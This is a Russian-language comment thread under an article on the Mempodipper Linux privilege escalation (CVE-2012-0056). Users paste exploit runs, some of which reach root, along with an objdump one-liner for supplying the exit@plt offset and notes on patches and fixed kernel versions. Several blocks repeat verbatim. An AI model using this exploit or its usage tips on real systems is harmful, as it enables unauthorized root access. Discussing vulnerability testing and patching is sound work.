Comments 44
one click root для android 4, это хорошо…
Фокус не работает. Gentoo Hardened, ядро 3.1.5-hardened (ebuild от 6-го января, патчи к ядру от 7-го января). Вероятно pax/grsecurity эту дыру прикрывают.
$ gcc -o mempodipper mempodipper.c
$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/19624/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: ./mempodipper -o ADDRESS
[-] Example: ./mempodipper -o 0x402178
$ ls -l /bin/su
-rws--x--x 1 root root 34572 Сен 26 23:37 /bin/su
$ sudo objdump -d /bin/su | grep 'exit@plt' | head -n 1 | cut -d ' ' -f 1 | sed 's/^[0]*\([^0]*\)/0x\1/'
Пароль:
0x1fac
$ ./mempodipper -o 0x1fac
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/19761/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x1f91.
[+] Executing su with shellcode.
$ id
uid=1000(powerman) gid=100(users) группы=100(users),...
$ strace -f ./mempodipper -o 0x1fac
...
write(2, "\320\235\320\265\320"..., 89) = -1 EIO (Input/output error)
exit_group(1) = ?
Причина другая, у генты по умолчанию
Нет права на чтение у левого пользователя.
Эксплоит просто не знал точку входа.
Если скормить ему вывод как параметр вывод
все сработает.
например
-rws--x--x 1 root root 39320 Окт 24 21:29 /bin/suНет права на чтение у левого пользователя.
Эксплоит просто не знал точку входа.
Если скормить ему вывод как параметр вывод
objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'все сработает.
например
./mempodipper -o 0x402178
В AgiliaLinux 8.0 не работает:
drakmail@thinkpad-x220:~$ uname -a
Linux thinkpad-x220 3.1.8 #1 SMP PREEMPT Sun Jan 8 18:53:10 UTC 2012 x86_64 Intel® Core(TM) i5-2410M CPU @ 2.30GHz GenuineIntel GNU/Linux
drakmail@thinkpad-x220:~$ ./a.out
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/21203/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401e48.
[+] Calculating su padding.
[+] Seeking to offset 0x401e2b.
[+] Executing su with shellcode.
drakmail@thinkpad-x220:~$ whoami
drakmail
Debian 6 и unstable уязвимы
Только что проверил на Debian 6 — не работает.
user2@dev1:~$ uname -a
Linux dev1 2.6.32-5-amd64 #1 SMP Mon Oct 3 03:59:20 UTC 2011 x86_64 GNU/Linux
user2@dev1:~$ gcc 1.c -o 1
user2@dev1:~$ ./1
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/9008/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f8d.
[+] Executing su with shellcode.
user2@dev1:~$ whoami
user2
user2@dev1:~$ uname -a
Linux dev1 2.6.32-5-amd64 #1 SMP Mon Oct 3 03:59:20 UTC 2011 x86_64 GNU/Linux
user2@dev1:~$ gcc 1.c -o 1
user2@dev1:~$ ./1
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/9008/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f8d.
[+] Executing su with shellcode.
user2@dev1:~$ whoami
user2
Замечательно! Все работает:
Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
Аналогично
Linux 3.2.0-030200-generic #201201042035 SMP Thu Jan 5 01:36:31 UTC 2012 x86_64 GNU/Linux
Увы:
% uname -a
Linux test 3.2.1-1-ARCH #1 SMP PREEMPT Fri Jan 13 08:19:09 UTC 2012 i686 Intel® Atom(TM) CPU N455 @ 1.66GHz GenuineIntel GNU/Linux
[+] Executing su with shellcode.
[1] 13091 segmentation fault ./mempodipper
% whoami
test
3.0.0-14-generic #23-Ubuntu SMP Mon Nov 21 20:34:47 UTC 2011 i686 athlon i386 GNU/Linux
Works
Works
РЕШЕТО
НЕРЕШЕТО, уже пропатчили
Ога, видео из 2005-го, ссылающееся на данную проблему, как известную еще КАК МИНИМУМ с 1997-года (но скорее всего известную и ранее). Где принимают ставки на то, что эта проблема (немного модифицированная, естественно) еще всплывет?
Картинка для привлечения внимания:
Картинка для привлечения внимания:
Ubuntu 11.04 не пашет. Десктоп, серверов для теста нету.
Linux zerst 2.6.38-13-generic #54-Ubuntu SMP Tue Jan 3 13:44:52 UTC 2012 i686 athlon i386 GNU/Linux
Linux zerst 2.6.38-13-generic #54-Ubuntu SMP Tue Jan 3 13:44:52 UTC 2012 i686 athlon i386 GNU/Linux
Можно попробовать в живой системе исправить при помощи systemtap и dbg файлов ядра: www.outflux.net/blog/archives/2012/01/22/fixing-vulnerabilities-with-systemtap/
Failed
Linux nb.cnet 2.6.41.4-1.fc15.x86_64 #1 SMP Tue Nov 29 11:53:48 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
strace:
Linux nb.cnet 2.6.41.4-1.fc15.x86_64 #1 SMP Tue Nov 29 11:53:48 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
strace:
write(2, "su: ", 4) = -1 EIO (Input/output error)
write(2, "\320\277\320\276\320\273\321\214\320\267\320\276\320\262\320\260\321\202\320\265\320\273\321\214 H1\377\260i\17\5"..., 120) = -1 EIO (Input/output error)
write(2, "\n", 1) = -1 EIO (Input/output error)
CentOS 5 i386
$ cat /etc/issue
CentOS release 5.6 (Final)
Kernel \r on an \m
$ uname -r
2.6.18-238.19.1.el5PAE
$ gcc mempodipper.c -o mempodipper
$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Executing child from child fork.
[+] Opening parent mem /proc/24125/mem in child.
[+] Sending fd 6 to parent.
[+] Waiting for transferred fd in parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1190.
[+] Calculating su padding.
[+] Seeking to offset 0x117a.
[+] Executing su with shellcode.
su: пользователь 1ш╟м─1ш╟.м─1иЁ╠╟? м─1юPhn/shh//bi┴Ц1рf╨-iR┴Ю1рRPS┴А1р1ю╟
м─ не существует
$ id
uid=501(test) gid=501(test) группы=501(test)
CentOS 6 i386
$ cat /etc/issue
CentOS Linux release 6.0 (Final)
Kernel \r on an \m
$ uname -r
2.6.32-71.29.1.el6.i686
$ gcc mempodipper.c -o mempodipper
$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6093/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x80491b0.
[+] Calculating su padding.
[+] Seeking to offset 0x804918e.
[+] Executing su with shellcode.
$ id
uid=500(111) gid=500(111) группы=500(111) контекст=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
ArchLinux i686
$ cat /etc/issue
Arch Linux \r (\n) (\l)
$ uname -r
3.2.1-1-ARCH
$ gcc mempodipper.c -o mempodipper
$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4720/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x8049180.
[+] Calculating su padding.
[+] Seeking to offset 0x804915e.
[+] Executing su with shellcode.
Ошибка сегментирования
$ id
uid=1001(test) gid=1001(test) группы=1001(test),7(lp),91(video),92(audio),93(optical),95(storage),98(power),100(users)
п.с:
Дома попробую на 64 битном арче
$ cat /etc/issue
CentOS release 5.6 (Final)
Kernel \r on an \m
$ uname -r
2.6.18-238.19.1.el5PAE
$ gcc mempodipper.c -o mempodipper
$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Executing child from child fork.
[+] Opening parent mem /proc/24125/mem in child.
[+] Sending fd 6 to parent.
[+] Waiting for transferred fd in parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1190.
[+] Calculating su padding.
[+] Seeking to offset 0x117a.
[+] Executing su with shellcode.
su: пользователь 1ш╟м─1ш╟.м─1иЁ╠╟? м─1юPhn/shh//bi┴Ц1рf╨-iR┴Ю1рRPS┴А1р1ю╟
м─ не существует
$ id
uid=501(test) gid=501(test) группы=501(test)
CentOS 6 i386
$ cat /etc/issue
CentOS Linux release 6.0 (Final)
Kernel \r on an \m
$ uname -r
2.6.32-71.29.1.el6.i686
$ gcc mempodipper.c -o mempodipper
$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6093/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x80491b0.
[+] Calculating su padding.
[+] Seeking to offset 0x804918e.
[+] Executing su with shellcode.
$ id
uid=500(111) gid=500(111) группы=500(111) контекст=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
ArchLinux i686
$ cat /etc/issue
Arch Linux \r (\n) (\l)
$ uname -r
3.2.1-1-ARCH
$ gcc mempodipper.c -o mempodipper
$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4720/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x8049180.
[+] Calculating su padding.
[+] Seeking to offset 0x804915e.
[+] Executing su with shellcode.
Ошибка сегментирования
$ id
uid=1001(test) gid=1001(test) группы=1001(test),7(lp),91(video),92(audio),93(optical),95(storage),98(power),100(users)
п.с:
Дома попробую на 64 битном арче
Печально.
[huzferd@arch ~]$ uname -a
Linux arch 3.2.1-1-ARCH #1 SMP PREEMPT Fri Jan 13 06:50:31 CET 2012 x86_64 Pentium® Dual-Core CPU E6500 @ 2.93GHz GenuineIntel GNU/Linux
[huzferd@arch ~]$ gcc run.c -o run
[huzferd@arch ~]$ ./run
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/1215/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401dd0.
[+] Calculating su padding.
[+] Seeking to offset 0x401dae.
[+] Executing su with shellcode.
[huzferd@arch ~]$ whoami
huzferd
[huzferd@arch ~]$ pacman -S
ошибка: Вы не можете выполнить эту операцию, не являясь суперпользователем (root).
blacklynx@blacklynx:~/Downloads$ uname -a
Linux blacklynx 3.0.0-15-generic-pae #25-Ubuntu SMP Mon Jan 2 19:40:15 UTC 2012 i686 i686 i386 GNU/Linux
blacklynx@blacklynx:~/Downloads$ ./memodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/10262/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x8049520.
[+] Calculating su padding.
[+] Seeking to offset 0x8049514.
[+] Executing su with shellcode.
# id
uid=0(root) gid=0(root)
Linux blacklynx 3.0.0-15-generic-pae #25-Ubuntu SMP Mon Jan 2 19:40:15 UTC 2012 i686 i686 i386 GNU/Linux
blacklynx@blacklynx:~/Downloads$ ./memodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/10262/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x8049520.
[+] Calculating su padding.
[+] Seeking to offset 0x8049514.
[+] Executing su with shellcode.
# id
uid=0(root) gid=0(root)
Ubuntu 11.10 со всеми обновлениями.
Эксплоит прекрасно работает.
img52.imageshack.us/img52/2474/16167251.png
Эксплоит прекрасно работает.
img52.imageshack.us/img52/2474/16167251.png
Примерно через 5 минут после вашего комментария вышел патч, закрывающий уязвимость на 11.10 — тыц.
только обновился до
Linux home 3.1.6-gentoo #1 SMP Mon Jan 23 17:23:35 CET 2012 x86_64 AMD Athlon(tm) 64 X2 Dual Core Processor 6000+ AuthenticAMD GNU/Linux — рут работает
Linux home 3.1.6-gentoo #1 SMP Mon Jan 23 17:23:35 CET 2012 x86_64 AMD Athlon(tm) 64 X2 Dual Core Processor 6000+ AuthenticAMD GNU/Linux — рут работает
Накатил последнее обновление для LinuxMint 12 — все норм стало:)
Linux anri-pc 3.0.0-15-generic #26-Ubuntu SMP Fri Jan 20 17:23:00 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
Linux anri-pc 3.0.0-15-generic #26-Ubuntu SMP Fri Jan 20 17:23:00 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
На 3.1.5-hardened эксплойт не работает. На десктопах с gentoo-sources повторил, уже пропатчил и почти пересобрал ядро.
Проверил на виртуалке в Debian squeeze, ядра 2.6.39 и 3.1.0-0. на обоих эксплоит сработал
обновляем
apt-get update && apt-get upgrade
обновлено 0, установлено 0 новых пакетов, для удаления отмечено 0 пакетов, и 0 пакетов не обновлено.
uname -a
Linux debian 2.6.39-bpo.2-amd64 #1 SMP Tue Jul 26 10:35:23 UTC 2011 x86_64 GNU/Linux
$ whoami
alex
$ ~/expl
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2468/mem in child.
[+] Sending fd 8 to parent.
[+] Received fd at 8.
[+] Assigning fd 8 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f8d.
[+] Executing su with shellcode.
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),1004(alex)
uname -a
Linux debian 3.1.0-0.bpo.1-amd64 #1 SMP Mon Jan 23 08:42:50 UTC 2012 x86_64 GNU/Linux
$ whoami
alex
$ ~/expl
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2468/mem in child.
[+] Sending fd 8 to parent.
[+] Received fd at 8.
[+] Assigning fd 8 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f8d.
[+] Executing su with shellcode.
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),1004(alex)
обновляем
apt-get update && apt-get upgrade
обновлено 0, установлено 0 новых пакетов, для удаления отмечено 0 пакетов, и 0 пакетов не обновлено.
uname -a
Linux debian 2.6.39-bpo.2-amd64 #1 SMP Tue Jul 26 10:35:23 UTC 2011 x86_64 GNU/Linux
$ whoami
alex
$ ~/expl
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2468/mem in child.
[+] Sending fd 8 to parent.
[+] Received fd at 8.
[+] Assigning fd 8 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f8d.
[+] Executing su with shellcode.
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),1004(alex)
uname -a
Linux debian 3.1.0-0.bpo.1-amd64 #1 SMP Mon Jan 23 08:42:50 UTC 2012 x86_64 GNU/Linux
$ whoami
alex
$ ~/expl
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2468/mem in child.
[+] Sending fd 8 to parent.
[+] Received fd at 8.
[+] Assigning fd 8 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f8d.
[+] Executing su with shellcode.
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),1004(alex)
Узнать подвержены вы или нет можно с помощью: grsecurity.net/~spender/correct_proc_mem_reproducer.c. И без заморочек с su.
-bash-4.1$ uname -a
Linux centos 2.6.32-220.2.1.el6.x86_64 #1 SMP Fri Dec 23 02:21:33 CST 2011 x86_64 x86_64 x86_64 GNU/Linux
-bash-4.1$ ./ex.c
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6583/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1e70.
[+] Calculating su padding.
[+] Seeking to offset 0x1e62.
[+] Executing su with shellcode.
-bash-4.1$
Linux centos 2.6.32-220.2.1.el6.x86_64 #1 SMP Fri Dec 23 02:21:33 CST 2011 x86_64 x86_64 x86_64 GNU/Linux
-bash-4.1$ ./ex.c
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6583/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1e70.
[+] Calculating su padding.
[+] Seeking to offset 0x1e62.
[+] Executing su with shellcode.
-bash-4.1$
Данный баг в гентушной багзилле
CVE-2012-0056
CVE-2012-0056
Интересно, написано же, что проблема в ядрах 2.6.39 и выше. Смысл проверять на более старых ядрах и писать в очередной раз «не работает»?
В генте пофиксили баг в
gentoo-sources-3.2.1-r2
gentoo-sources-3.1.10-r1
gentoo-sources-3.0.17-r2
Последние два стабилизированы. Баг экстренной стабилизации первого
gentoo-sources-3.2.1-r2
gentoo-sources-3.1.10-r1
gentoo-sources-3.0.17-r2
Последние два стабилизированы. Баг экстренной стабилизации первого
Sign up to leave a comment.
Повышение привилегий в Linux >=2.6.39